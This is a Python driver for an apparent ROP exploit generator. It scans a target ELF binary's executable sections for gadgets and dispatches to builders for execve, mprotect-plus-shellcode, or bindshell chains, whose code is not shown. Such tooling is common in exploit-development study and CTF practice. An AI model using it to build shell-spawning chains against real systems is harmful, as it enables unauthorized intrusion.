#!/usr/bin/python3
# This is the driver file.
import sys
from argparse import ArgumentParser

from capstone import *
from elftools.elf.elffile import ELFFile

import get_gadgets
import categorize
import chain
import print_pretty
import general
import execveChain
import mprotectChain
import bindshellChain
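# ELF section-header flag (SHF_EXECINSTR) marking a section as holding
# machine code.  It is bit 2 of sh_flags (value 0x4), not the first bit as the
# old comment said; only such sections are scanned for gadgets.
SHF_EXECINSTR = 0x4

# Chain builders selectable with --exploitType, keyed by the value the user
# passes.  Each builder is called as builder(categorized_gadgets, path).
_CHAIN_BUILDERS = {
    "execve": execveChain.execveROPChain,          # execve() ROP shellcode
    "mprotect": mprotectChain.mprotectROPChain,    # mprotect() ROP + traditional shellcode
    "bindshell": bindshellChain.bindshellROPChain, # bindshell via ROP shellcode
}


def _print_exploit_types():
    """Print the supported --exploitType values (shared by both usage errors)."""
    print("1. 'execve' : Standard execve() ROP shellcode")
    print("2. 'mprotect' : mprotect() ROP Shellcode combined with execve traditional shellcode")
    print("3. 'bindshell' : Get a bindshell using ROP Shellcode")


def _build_parser():
    """Return the command-line parser for this driver.

    ``--length`` is parsed as an int here so a non-numeric value is reported by
    argparse instead of surfacing later as a ValueError traceback.
    """
    parser = ArgumentParser()
    parser.add_argument("-f", "--file", dest="filename",
                        help="vulnerable executable", metavar="FILE")
    # "c3" is the opcode of the x86 `ret` instruction that ends a gadget.
    parser.add_argument("-l", "--length", dest="length", type=int,
                        help="Max number of bytes to traverse above c3", metavar="NUM")
    parser.add_argument("-e", "--exploitType", dest="exploitType", metavar="EXPLOITTYPE",
                        help="chain to build, one of: " + ", ".join(_CHAIN_BUILDERS))
    parser.add_argument("-g", "--gadgets", dest="gadgets",
                        help="Flag to specify that gadgets need to be displayed", action='store_true')
    return parser


def _collect_gadgets(path, gadget_length):
    """Disassemble every executable section of the ELF at *path* and feed it to get_gadgets.

    Results accumulate in ``get_gadgets.allGadgets`` (module state owned by
    get_gadgets); nothing is returned.  Exits with status 1 if *path* cannot
    be opened.
    """
    # One disassembler instance, created once and reused for every section.
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    try:
        with open(path, 'rb') as fd:
            elffile = ELFFile(fd)
            # The disassembler is fixed to x86-64; a binary of another
            # architecture would decode as nonsense, so say so up front
            # rather than silently producing garbage gadgets.
            if elffile.get_machine_arch() != 'x64':
                print("Warning: " + path + " is not an x86-64 ELF; decoding as x86-64 anyway")
            print("Searching all executable sections....")
            for section in elffile.iter_sections():
                if not (section['sh_flags'] & SHF_EXECINSTR):
                    continue
                print("Searching the " + section.name + " section")
                opcodes = section.data()
                if not opcodes:
                    # Nothing to decode (zero-sized section).  The old
                    # `instructions == 0` test could never fire because
                    # disasm() returns a generator, so the check is on the
                    # input instead.
                    continue
                addr = section['sh_addr']  # virtual address of the section start
                instructions = md.disasm(opcodes, addr)
                get_gadgets.GetAllGadgets(instructions, opcodes, addr,
                                          get_gadgets.SpecialInstructions, gadget_length)
    except OSError as exc:
        print("Unable to open " + path + ": " + str(exc))
        sys.exit(1)


def main():
    """Entry point: validate arguments, collect gadgets, then display them or build a chain."""
    args = _build_parser().parse_args()
    if args.filename is None:
        print("Use the --file or -f flags to enter the vulnerable executable!")
        sys.exit(1)
    if args.length is None:
        print("Use the --length or -l flag to enter the max number of bytes to traverse above c3!")
        sys.exit(1)
    # --exploitType is only mandatory when a chain is to be built, not when
    # the user merely wants the gadget listing.
    if not args.gadgets and args.exploitType is None:
        print("Use the --exploitType flag to enter the type of exploit you need. ")
        print("There are 3 types of exploit as of now: ")
        _print_exploit_types()
        sys.exit(1)

    vulnExecutable = str(args.filename)
    _collect_gadgets(vulnExecutable, args.length)

    if args.gadgets:
        print_pretty.print_pretty(get_gadgets.allGadgets)

    # Keep only the two-instruction gadgets, categorize them, and publish the
    # result in general.ALLGADGETS (module state shared with the rest of the
    # project) before handing it to the selected builder.
    two_inst_gadgets = categorize.getLNGadgets(get_gadgets.allGadgets, 2)
    general.ALLGADGETS = categorize.categorize(two_inst_gadgets)

    # An unknown (or absent, when --gadgets was given) exploit type ends here
    # with the same listing and exit status as before.
    builder = _CHAIN_BUILDERS.get(args.exploitType)
    if builder is None:
        print("We support the following exploits: ")
        _print_exploit_types()
        sys.exit(1)
    builder(general.ALLGADGETS, vulnExecutable)


if __name__ == "__main__":
    main()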